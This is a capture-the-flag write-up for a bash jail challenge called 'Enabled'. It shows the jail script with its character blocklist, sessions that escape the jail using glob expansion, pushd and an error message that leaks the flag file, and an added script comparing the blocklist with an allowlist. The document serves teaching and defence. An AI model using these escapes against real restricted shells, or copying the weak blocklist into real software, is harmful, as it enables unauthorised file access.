Enabled - author: overllama - jail - misc

WriteUp: ap10

This challenge is a bash jail whose code is as follows:

#!/bin/bash

unset PATH
enable -n exec
enable -n command
enable -n type
enable -n hash
enable -n cd
enable -n enable
set +x

echo "Welcome to my new bash, sbash, the Safe Bourne Again Shell! There's no exploiting this system"

while true; do
    read -p "safe_bash> " user_input

    # Check if input is empty
    [[ -z "$user_input" ]] && continue

    case "$user_input" in 
        *">"*|*"<"*|*"/"*|*";"*|*"&"*|*"$"*|*"("*|*"\`"*) echo "No special characters, those are unsafe!" && continue;;
    esac

    # Execute only if it's a Bash builtin
    eval "$user_input"
done

The script unsets PATH, so we lose access to most external commands, and it disables the exec, command, type, hash, cd, and enable builtins with enable -n.

The jail then simply runs eval on our input, provided it contains none of the filtered characters (>, <, /, ;, &, $, (, and the backtick).

$ nc enabled.chal.cyberjousting.com 1352
Welcome to my new bash, sbash, the Safe Bourne Again Shell! There's no exploiting this system
echo bonjour
bonjour
echo $HOME
No special characters, those are unsafe!

The first command we tested was echo *. The shell expands the * glob itself, so this lists the files and directories in the current directory.

$ nc enabled.chal.cyberjousting.com 1352
Welcome to my new bash, sbash, the Safe Bourne Again Shell! There's no exploiting this system
echo *
run

There is a file named run in the current directory. Let’s try to execute it.

$ nc enabled.chal.cyberjousting.com 1352
Welcome to my new bash, sbash, the Safe Bourne Again Shell! There's no exploiting this system
run
Welcome to my new bash, sbash, the Safe Bourne Again Shell! There's no exploiting this system

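The banner is printed again, so run is the jail script itself.

The next step is to get out of this directory. Looking through the builtins that are still enabled, we notice pushd, which changes directory like cd.

Here is how we retrieved the flag. Entering flag.txt as a command makes bash try to run the file as a script, and the error message for its first line reveals the flag: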

Welcome to my new bash, sbash, the Safe Bourne Again Shell! There's no exploiting this system
pushd ..
/ /app
echo *
app bin boot dev etc flag home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
pushd flag
/flag / /app
echo *
flag.txt
flag.txt
flag.txt: line 1: byuctf{enable_can_do_some_funky_stuff_huh?_488h33d}: No such file or directory
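
The jail's filter is a blocklist, and every input used in the sessions above except echo $HOME passes it. As an added example (not the challenge's code), the script below runs those same inputs through the original case pattern and through a hypothetical allowlist that accepts only echo followed by plain words; allowlist_ok and verdict are names made up for this example.

```bash
#!/bin/bash
# Added example: the jail's character blocklist next to an allowlist check.

# The jail's original filter: reject only if a listed character appears.
blocklist_ok() {
    case "$1" in
        *">"*|*"<"*|*"/"*|*";"*|*"&"*|*"$"*|*"("*|*"\`"*) return 1 ;;
    esac
    return 0
}

# Hypothetical replacement: accept only "echo" followed by plain words.
# The body runs in a subshell so "set -f" does not leak to the caller.
allowlist_ok() (
    set -f                      # keep * and ? literal while splitting
    set -- $1                   # split the input into words
    [ "${1-}" = echo ] || exit 1
    shift
    for word in "$@"; do
        case "$word" in
            *[!A-Za-z0-9_.,-]*) exit 1 ;;   # any other character: reject
        esac
    done
    exit 0
)

# Report how each filter treats one input line.
verdict() {
    if blocklist_ok "$1"; then b=pass; else b=reject; fi
    if allowlist_ok "$1"; then a=pass; else a=reject; fi
    printf 'blocklist=%s allowlist=%s\n' "$b" "$a"
}

# Inputs taken from the sessions shown in this write-up.
for cmd in 'echo bonjour' 'echo $HOME' 'echo *' 'pushd ..' 'flag.txt'; do
    printf '%-14s %s\n' "$cmd" "$(verdict "$cmd")"
done
```

Only echo bonjour passes the allowlist; the glob, the pushd call and the bare file name pass the blocklist and are rejected by the allowlist.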